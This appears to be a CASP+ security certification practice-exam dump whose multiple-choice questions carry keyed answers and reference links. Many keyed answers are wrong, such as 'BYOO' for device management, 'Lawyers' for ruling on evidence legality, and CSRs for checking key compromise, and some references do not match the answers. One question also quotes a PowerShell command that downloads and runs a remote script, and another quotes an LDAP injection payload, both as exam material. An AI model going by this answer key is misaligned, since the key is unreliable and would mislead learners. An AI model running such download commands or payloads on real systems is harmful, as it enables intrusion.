CASP Plus B
SIMULATION You are a security analyst tasked with interpreting an Nmap scan output from company's privileged network. The company's hardening guidelines indicate the following: 1. There should be one primary server or service per device. 2. Only default ports should be used. 3. Non-secure protocols should be disabled. INSTRUCTIONS Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed. For each device found by Nmap, add a device entry to the Devices Discovered list, with the following information: 1. The IP address of the device 2. The primary server or service of the device (Note that each IP should by associated with one service/ port only) 3. The protocol(s) that should be disabled based on the hardening guidelines (Note that multiple ports may need to be closed to comply with the hardening guidelines) If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. A. See explanation below. B. Place Holder C. Place Holder D. Place Holder
Correct Answer: A Explanation Explanation/Reference: 10.1.45.65 SFTP Server Disable 8080 10.1.45.66 Email Server Disable 415 and 443 10.1.45.67 Web Server Disable 21, 80 10.1.45.68 UTM Appliance Disable 21
A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes. Which of the following should a security architect recommend? A. A DLP program to identify which files have customer data and delete them B. An ERP program to identify which processes need to be tracked C. A CMDB to report on systems that are not configured to security baselines D. A CRM application to consolidate the data and provision access based on the process and need
Correct Answer: A. A DLP program to identify which files have customer data and delete them Explanation/Reference: Reference: https://searchdatacenter.techtarget.com/definition/configuration-management-database#:~:text=A% 20configuration%20management%20database%20(CMDB,the%20relationships%20between%20those% 20components
An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems. Which of the following is the MOST likely security consequence of this attack? A. A turbine would overheat and cause physical harm. B. The engineers would need to go to the historian. C. The SCADA equipment could not be maintained. D. Data would be exfiltrated through the data diodes.
Correct Answer: A. A turbine would overheat and cause physical harm.
An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution. Which of the following designs would be BEST for the CISO to use? A. Adding a second redundant layer of alternate vendor VPN concentrators B. Using Base64 encoding within the existing site-to-site VPN connections C. Distributing security resources across VPN sites D. Implementing IDS services with each VPN concentrator E. Transitioning to a container-based architecture for site-based services
Correct Answer: A. Adding a second redundant layer of alternate vendor VPN concentrators Explanation/Reference: If on VPN concentrator goes down due to a zero day threat, having a redundant VPN concentrator of a different vendor should keep you going.
Which of the following is required for an organization to meet the ISO 27018 standard? A. All Pll must be encrypted. B. All network traffic must be inspected. C. GDPR equivalent standards must be met D. COBIT equivalent standards must be met
Correct Answer: A. All Pll must be encrypted.
An organization is assessing the security posture of a new SaaS CRM system that handles sensitive Pll and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following: 1- There will be a $20,000 per day revenue loss for each day the system is delayed going into production. 2- The inherent risk is high. 3- The residual risk is low. 4- There will be a staged deployment to the solution rollout to the contact center. Which of the following risk-handling techniques will BEST meet the organization's requirements? A. Apply for a security exemption, as the risk is too high to accept. B. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service. C. Accept the risk, as compensating controls have been implemented to manage the risk. D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.
Correct Answer: A. Apply for a security exemption, as the risk is too high to accept.
The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal? A. BYOO B. CYOD C. COPE D. MDM
Correct Answer: A. BYOO
A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly? A. Business impact rating B. CVE dates C. CVSS scores D. OVAL
Correct Answer: A. Business impact rating
A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open: 1. 22 2. 25 3. 110 4. 137 5. 138 6. 139 7. 445 Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company's distribution process. Which of the following would be the BEST solution to harden the system? A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface. B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. C. Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface. D. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.
Correct Answer: A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.
A large telecommunications equipment manufacturer needs to evaluate the strengths of security controls in a new telephone network supporting first responders. Which of the following techniques would the company use to evaluate data confidentiality controls? A. Eavesdropping B. On-path C. Cryptanalysis D. Code signing E. RF sidelobe sniffing
Correct Answer: A. Eavesdropping
An organization's assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API. Given this information, which of the following is a noted risk? A. Feature delay due to extended software development cycles B. Financial liability from a vendor data breach C. Technical impact to the API configuration D. The possibility of the vendor's business ceasing operations
Correct Answer: A. Feature delay due to extended software development cycles Explanation/Reference: Reference: https://legal.thomsonreuters.com/en/insights/articles/data-breach-liability
A user experiences an HTTPS connection error when trying to access an Internet banking website from a corporate laptop. The user then opens a browser on a mobile phone and is able to access the same Internet banking website without issue. Which of the following security configurations is MOST likely the cause of the error? A. HSTS B. TLS 1.2 C. Certificate pinning D. Client authentication
Correct Answer: A. HSTS
A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP: 1. Enforce MFA for RDP 2. Ensure RDP connections are only allowed with secure ciphers. The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network- level firewalls Of ACLs. Which of the following should the security architect recommend to meet these requirements? A. Implement a reverse proxy for remote desktop with a secure cipher configuration enforced. B. Implement a bastion host with a secure cipher configuration enforced. C. Implement a remote desktop gateway server, enforce secure ciphers, and configure to use OTP D. Implement a GPO that enforces TLS cipher suites and limits remote desktop access to only VPN users.
Correct Answer: A. Implement a reverse proxy for remote desktop with a secure cipher configuration enforced.
A company just released a new video card. Due to limited supply and nigh demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's Intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk? A. Inherent Low B. Mitigated C. Residual D. Transferred
Correct Answer: A. Inherent Low
An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs? A. Ladder logic B. Rust C. C D. Python E. Java
Correct Answer: A. Ladder logic
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence. Which of the following offers an authoritative decision about whether the evidence was obtained legally? A. Lawyers B. Court C. Upper management team D. Police
Correct Answer: A. Lawyers
A security engineer needs 10 implement a CASB to secure employee user web traffic. A Key requirement is mat relevant event data must be collected from existing on-premises infrastructure components and consumed by me CASB to expand traffic visibility. The solution must be nighty resilient to network outages. Which of the following architectural components would BEST meet these requirements? A. Log collection B. Reverse proxy C. AWAF D. API mode
Correct Answer: A. Log collection
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements: 1. Be efficient at protecting the production environment 2. Not require any change to the application 3. Act at the presentation layer Which of the following techniques should be used? A. Masking B. Tokenization C. Algorithmic D. Random substitution
Correct Answer: A. Masking
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment. Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant? A. NAC to control authorized endpoints B. FIM on the servers storing the data C. A jump box in the screened subnet D. A general VPN solution to the primary network
Correct Answer: A. NAC to control authorized endpoints Explanation/Reference: Network Access Control (NAC) is used to bolster the network security by restricting the availability of network resources to managed endpoints that don't satisfy the compliance requirements of the Organization.
Based on PCI DSS v3.4, One Particular database field can store data, but the data must be unreadable. Which of the following data objects meets this requirement? A. PAN B. CVV2 C. Cardholder name D. expiration date
Correct Answer: A. PAN
An organization requires a contractual document that includes 1. An overview of what is covered 2. Goals and objectives 3. Performance metrics for each party 4. A review of how the agreement is managed by all parties Which of the following BEST describes this type of contractual document? A. SLA B. BAA C. NDA D. ISA
Correct Answer: A. SLA
Given the following log snippet from a web server: Which of the following BEST describes this type of attack? A. SQL injection B. Cross-site scripting C. Brute-force D. Cross-site request forgery
Correct Answer: A. SQL injection
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform? A. Securely configure the authentication mechanisms. B. Patch the infrastructure at the operating system. C. Execute port scanning against the services. D. Upgrade the service as part of life-cycle management.
Correct Answer: A. Securely configure the authentication mechanisms.
A security analyst is reviewing the following vulnerability assessment report: Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts? A. Server1 B. Server2 C. Server 3 D. Servers
Correct Answer: A. Server1
A small business would like to provide guests who are using mobile devices encrypted WPA3 access without first distributing PSKs or other credentials. Which of the following features will enable the business to meet this objective? A. Simultaneous Authentication of Equals B. Enhanced open C. Perfect forward secrecy D. Extensible Authentication Protocol
Correct Answer: A. Simultaneous Authentication of Equals
A help desk technician just informed the security department that a user downloaded a suspicious file from internet explorer last night. The user confirmed accessing all the files and folders before going home from work. the next morning, the user was no longer able to boot the system and was presented a screen with a phone number. The technician then tries to boot the computer using wake-on-LAN, but the system would not come up. which of the following explains why the computer would not boot? A. The operating system was corrupted. B. SElinux was in enforced status. C. A secure boot violation occurred. D. The disk was encrypted.
Correct Answer: A. The operating system was corrupted
A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data? A. The principle of lawful, fair, and transparent processing B. The right to be forgotten principle of personal data erasure requests C. The non-repudiation and deniability principle D. The principle of encryption, obfuscation, and data masking
Correct Answer: A. The principle of lawful, fair, and transparent processing
Which of the following protocols is a low power, low data rate that allows for the creation of PAN networks? A. Zigbee B. CAN C. DNP3 D. Modbus
Correct Answer: A. Zigbee Explanation/Reference: Reference: https://urgentcomm.com/2007/11/01/connecting-on-a-personal-level/
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate. This is an example of: A. due intelligence B. e-discovery. C. due care. D. legal hold.
Correct Answer: A. due intelligence Explanation/Reference: Reference: https://www.ansarada.com/due-diligence/hr
An auditor needs to scan documents at rest for sensitive text. These documents contain both text and Images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Select TWO). A. Document interpolation B. Regular expression pattern matching C. Optical character recognition functionality D. Baseline image matching E. Advanced rasterization F. Watermarking
Correct Answer: AC Document interpolation Optical character recognition functionality
An auditor needs to scan documents at rest for sensitive text. These documents contain both text and Images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Select TWO). A. Document interpolation B. Regular expression pattern matching C. Optical character recognition functionality D. Baseline image matching E. Advanced rasterization F. Watermarking
Correct Answer: AC Document interpolation Optical character recognition functionality
A healthcare system recently suffered from a ransomware incident As a result the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Select THREE). A. SD-WAN B. PAM C. Remote access VPN D. MFA E. Network segmentation F. BGP G. NAC
Correct Answer: ACE SD-WAN Remote access VPN Network segmentation
A security architect is reviewing the following proposed corporate firewall architecture and configuration: Both firewalls are stateful and provide Layer 7 filtering and routing. The company has the following requirements: 1. Web servers must receive all updates via HTTP/S from the corporate network. 2. Web servers should not initiate communication with the Internet. 3. Web servers should only connect to preapproved corporate database servers. 4. Employees' computing devices should only connect to web services over ports 80 and 443. Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.) A. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 B. Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443 C. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535 D. Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535 E. Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535 F. Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443
Correct Answer: AD Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535
An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application: 1. Low latency for all mobile users to improve the users' experience 2. SSL offloading to improve web server performance 3. Protection against DoS and DDoS attacks 4. High availability Which of the following should the organization implement to BEST ensure all requirements are met? A. A cache server farm in its datacenter B. A load-balanced group of reverse proxy servers with SSL acceleration C. A CDN with the origin set to its datacenter D. Dual gigabit-speed Internet connections with managed DDoS prevention
Correct Answer: B. A load-balanced group of reverse proxy servers with SSL acceleration
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN. Which of the following solutions does this describe? A. Full tunneling B. Asymmetric routing C. SSH tunneling D. Split tunneling
Correct Answer: B. Asymmetric routing
Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment? A. Remote provider BCDR B. Cloud provider BCDR C. Alternative provider BCDR D. Primary provider BCDR
Correct Answer: B. Cloud provider BCDR
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack. Which of the following is the NEXT step of the incident response plan? A. Remediation B. Containment C. Response D. Recovery
Correct Answer: B. Containment Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/containment-strategy
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence. Which of the following techniques would BEST support this? A. Configuring systemd services to run automatically at startup B. Creating a backdoor C. Exploiting an arbitrary code execution exploit D. Moving laterally to a more authoritative server/service
Correct Answer: B. Creating a backdoor
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out. Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered? A. Drive wiping B. Degaussing C. Purging D. Physical destruction
Correct Answer: B. Degaussing Explanation/Reference: Reference: https://securis.com/data-destruction/degaussing-as-a-service/
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed. Which of the following side-channel attacks did the team use? A. Differential power analysis B. Differential fault analysis C. Differential temperature analysis D. Differential timing analysis
Correct Answer: B. Differential fault analysis Explanation/Reference: "Differential fault analysis (DFA) is a type of active side-channel attack in the field of cryptography, specifically cryptanalysis. The principle is to induce faults--unexpected environmental conditions--into cryptographic operations, to reveal their internal states." Reference: https://www.hitachi-hightech.com/global/products/science/tech/ana/thermal/descriptions/ dta.html
Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint? A. Isolation control failure B. Management plane breach C. Insecure data deletion D. Resource exhaustion
Correct Answer: B. Management plane breach
A company's Chief Information Security Officer is concerned that the company's proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC. Which of the following compensating controls would be BEST to implement in this situation? A. EDR B. SIEM C. HIDS D. UEBA
Correct Answer: B. SIEM Explanation/Reference: Reference: https://runpanther.io/cyber-explained/cloud-based-siem-explained/
A security engineer is reviewing a record of events after a recent data breach incident that Involved the following: 1. A hacker conducted reconnaissance and developed a footprint of the company s Internet- facing web application assets. 2. A vulnerability in a third-party horary was exploited by the hacker, resulting in the compromise of a local account. 3. The hacker took advantage of the account's excessive privileges to access a data store and exfilltrate the data without detection. Which of the following is the BEST solution to help prevent this type of attack from being successful in the future? A. Dynamic analysis B. Secure web gateway C. Software composition analysis D. User behavior analysis E. Web application firewall
Correct Answer: B. Secure web gateway
A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information. The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach? A. The pharmaceutical company B. The cloud software provider C. The web portal software vendor D. The database software vendor
Correct Answer: B. The cloud software provider
Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution? A. Biometric authenticators are immutable. B. The likelihood of account compromise is reduced. C. Zero trust is achieved. D. Privacy risks are minimized.
Correct Answer: B. The likelihood of account compromise is reduced. Explanation/Reference: Reference: https://cloudworks.no/en/5-benefits-of-passwordless-authentication/
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted: A. when it is passed across a local network. B. in memory during processing C. when it is written to a system's solid-state drive. D. by an enterprise hardware security module.
Correct Answer: B. in memory during processing
A company Invested a total of $10 million lor a new storage solution Installed across live on-site datacenters. Fitly percent of the cost of this Investment was for solid-state storage. Due to the high rate of wear on this storage, the company Is estimating that 5% will need to be replaced per year. Which of the following is the ALE due to storage replacement? A. $50,000 B. $125,000 C. $250,000 D. $500.000 E. $51,000,000
Correct Answer: C. $250,000
A company security engineer arrives at work to face the following scenario: 1) Website defacement 2) Calls from the company president indicating the website needs to be fixed Immediately because It Is damaging the brand 3) A Job offer from the company's competitor 4) A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data Which of the following threat actors Is MOST likely involved? A. Organized crime B. Script kiddie C. APT/nation-state D. Competitor
Correct Answer: C. APT/nation-state
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines: 1. Must have a minimum of 15 characters 2. Must use one number 3. Must use one capital letter 4. Must not be one of the last 12 passwords used Which of the following policies should be added to provide additional security? A. Shared accounts B. Password complexity C. Account lockout D. Password history E. Time-based logins
Correct Answer: C. Account lockout Explanation/Reference: Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/ account-lockout-threshold
A cybersecurity analyst discovered a private key that could have been exposed. Which of the following is the BEST way for the analyst to determine if the key has been compromised? A. HSTS B. CRL C. CSRs D. OCSP
Correct Answer: C. CSRs Explanation/Reference: Reference: https://www.ssl.com/faqs/compromised-private-keys/
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government? A. Encryption in transit B. Legal issues C. Chain of custody D. Order of volatility E. Key exchange
Correct Answer: C. Chain of custody
A software company is developing an application in which data must be encrypted with a cipher that requires the following: 1. Initialization vector 2. Low latency 3. Suitable for streaming Which of the following ciphers should the company use? A. Cipher feedback B. Cipher block chaining message authentication code C. Cipher block chaining D. Electronic codebook
Correct Answer: C. Cipher block chaining Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/symmetric-cipher
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation? A. Loss of governance B. Vendor lockout C. Compliance risk D. Vendor lock-in
Correct Answer: C. Compliance risk
A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls? A. Create a change management process. B. Establish key performance indicators. C. Create an integrated master schedule. D. Develop a communication plan. E. Perform a security control assessment.
Correct Answer: C. Create an integrated master schedule
An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them. Which of the following is the BEST design option to optimize security? A. Limit access to the system using a jump box. B. Place the new system and legacy system on separate VLANs C. Deploy the legacy application on an air-gapped system. D. Implement MFA to access the legacy system.
Correct Answer: C. Deploy the legacy application on an air-gapped system.
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice. Which of the following should the organization consider FIRST to address this requirement? A. Implement a change management plan to ensure systems are using the appropriate versions. B. Hire additional on-call staff to be deployed if an event occurs. C. Design an appropriate warm site for business continuity. D. Identify critical business processes and determine associated software and hardware requirements.
Correct Answer: C. Design an appropriate warm site for business continuity. Explanation/Reference: Reference: https://searchdisasterrecovery.techtarget.com/definition/warm-site
A security analyst has noticed a steady increase in the number of failed login attempts to the external- facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell "IEX(New-Object Net.WebClient).DownloadString (`https://content.comptia.org/casp/ whois.psl');whois" Which of the following security controls would have alerted and prevented the next phase of the attack? A. Antivirus and UEBA B. Reverse proxy and sandbox C. EDR and application approved list D. Forward proxy and MFA
Correct Answer: C. EDR and application approved list Explanation/Reference: An EDR and whitelist should protect from this attack.
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware. Which of the following BEST describes the type of malware the solution should protect against? A. Worm B. Logic bomb C. Fileless D. Rootkit
Correct Answer: C. Fileless Explanation/Reference: Reference: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking- detecting-and-thwarting-powershell-based-malware-and-attacks
A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved. Which of the following would provide this information? A. HIPS B. UEBA C. HIDS D. NIDS
Correct Answer: C. HIDS Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/host-based-intrusion-detection- systems
A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative , the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team? A. Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events. B. Create an SLA for each application that states when the application will come back online and distribute this information to the business units. C. Have each business unit conduct a BIA and categories the application according to the cumulative data gathered. D. Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.
Correct Answer: C. Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.
As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver's licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation. Which of the following BEST describes this process? A. Deepfake B. Know your customer C. Identity proofing D. Passwordless
Correct Answer: C. Identity proofing Explanation/Reference: Reference: https://auth0.com/blog/what-is-identity-proofing-and-why-does-it-matter/
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: (&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability? A. Network intrusion prevention B. Data encoding C. Input validation D. CAPTCHA
Correct Answer: C. Input validation Explanation/Reference: Reference: https://book.hacktricks.xyz/pentesting-web/ldap-injection
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic. When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the network? A. Packets that are the wrong size or length B. Use of any non-DNP3 communication on a DNP3 port C. Multiple solicited responses over time D. Application of an unsupported encryption algorithm
Correct Answer: C. Multiple solicited responses over time
A developer wants to develop a secure external-facing web application. The developer is looking for an online community that produces tools, methodologies, articles, and documentation in the field of web- application security Which of the following is the BEST option? A. ICANN B. PCI DSS C. OWASP D. CSA E. NIST
Correct Answer: C. OWASP
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents. Which of the following BEST describes this kind of risk response? A. Risk rejection B. Risk mitigation C. Risk transference D. Risk avoidance
Correct Answer: C. Risk transference Explanation/Reference: Reference: https://hbr.org/2021/01/cybersecurity-insurance-has-a-big-problem
A company wants to improve Its active protection capabilities against unknown and zero- day malware. Which of the following Is the MOST secure solution? A. NIDS B. Application allow list C. Sandbox detonation D. Endpoint log collection E. HIDS
Correct Answer: C. Sandbox detonation Explanation
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight. Which of the following testing methods would be BEST for the engineer to utilize in this situation? A. Software composition analysis B. Code obfuscation C. Static analysis D. Dynamic analysis
Correct Answer: C. Static analysis
A company Is adopting a new artificial-intelligence-based analytics SaaS solution. This Is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk In adopting this solution? A. The inability to assign access controls to comply with company policy B. The inability to require the service provider process data in a specific country C. The inability to obtain company data when migrating to another service D. The inability to conduct security assessments against a service provider
Correct Answer: C. The inability to obtain company data when migrating to another service
A recent data breach stemmed from unauthorized access to an employee's company account with a cloud- based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information. Which of the following BEST mitigates inappropriate access and permissions issues? A. SIEM B. CASB C. WAF D. SOAR
Correct Answer: C. WAF Explanation/Reference: Reference: https://www.cloudflare.com/en-gb/learning/ddos/glossary/web-application-firewall-waf/
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication. Which of the following technologies would BEST meet this need? A. Faraday cage B. WPA2 PSK C. WPA3 SAE D. WEP 128 bit
Correct Answer: C. WPA3 SAE Explanation/Reference: WPA3 SAE prevents brute-force attacks. Reference: https://support.enplug.com/hc/en-us/articles/205160175-Setting-your-WiFi-encryption-as- WPA2-PSK
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company's Linux servers. While the software version is no longer supported by the OSS community, the company's Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future. Based on this agreement, this finding is BEST categorized as a: A. true positive. B. true negative. C. false positive. D. false negative.
Correct Answer: C. false positive.
A forensic investigator would use the foremost command for: A. cloning disks. B. analyzing network-captured packets. C. recovering lost files. D. extracting features such as email addresses.
Correct Answer: C. recovering lost files. Explanation/Reference: Reference: https://www.networkworld.com/article/2333727/foremost--a-linux-computer-forensics-tool.html
A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information. Which of the following would be BEST for the company to implement? A. A WAF B. An IDS C. A SIEM D. A honeypot
Correct Answer: D. A honeypot Explanation/Reference: Reference: https://www.kaspersky.com/resource-center/threats/what-is-a-honeypot
A systems administrator is preparing to run a vulnerability scan on a set of information systems in the organization. The systems administrator wants to ensure that the targeted systems produce accurate information especially regarding configuration settings. Which of the following scan types will provide the systems administrator with the MOST accurate information? A. A passive, credentialed scan B. A passive, non-credentialed scan C. An active, non-credentialed scan D. An active, credentialed scan
Correct Answer: D. An active, credentialed scan
A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market. Which of the following should the company implement to address the risk of system unavailability? A. User and entity behavior analytics B. Redundant reporting systems C. A self-healing system D. Application controls
Correct Answer: D. Application controls
An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PI I and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following: 1) There will be a 520,000 per day revenue loss for each day the system is delayed going into production. 2) The inherent risk is high. 3) The residual risk is low. 4) There will be a staged deployment to the solution rollout to the contact center. Which of the following risk-handling techniques will BEST meet the organization's requirements? A. Apply for a security exemption, as the risk is too high to accept. B. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service. C. Accept the risk, as compensating controls have been implemented to manage the risk. D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.
Correct Answer: D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.
Which of the following technologies allows CSPs to add encryption across multiple data storages? A. Symmetric encryption B. Homomorphic encryption C. Data dispersion D. Bit splitting
Correct Answer: D. Bit splitting Explanation/Reference: Reference: https://www.hhs.gov/sites/default/files/nist800111.pdf
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software. During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational. Which of the following BEST describes the reason why the silent failure occurred? A. The system logs rotated prematurely. B. The disk utilization alarms are higher than what the service restarts require. C. The number of nodes in the self-healing cluster was healthy. D. Conditional checks prior to the service restart succeeded.
Correct Answer: D. Conditional checks prior to the service restart succeeded.
A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements: 1. Work at the application layer 2. Send alerts on attacks from both privileged and malicious users 3. Have a very low false positive Which of the following should the architect recommend? A. FIM B. WAF C. NIPS D. DAM E. UTM
Correct Answer: D. DAM
A software development company makes Its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website. Which of the following would be the BEST technique to ensure the software the users download is the official software released by the company? A. Distribute the software via a third-party repository. B. Close the web repository and deliver the software via email. C. Email the software link to all customers. D. Display the SHA checksum on the website.
Correct Answer: D. Display the SHA checksum on the website.
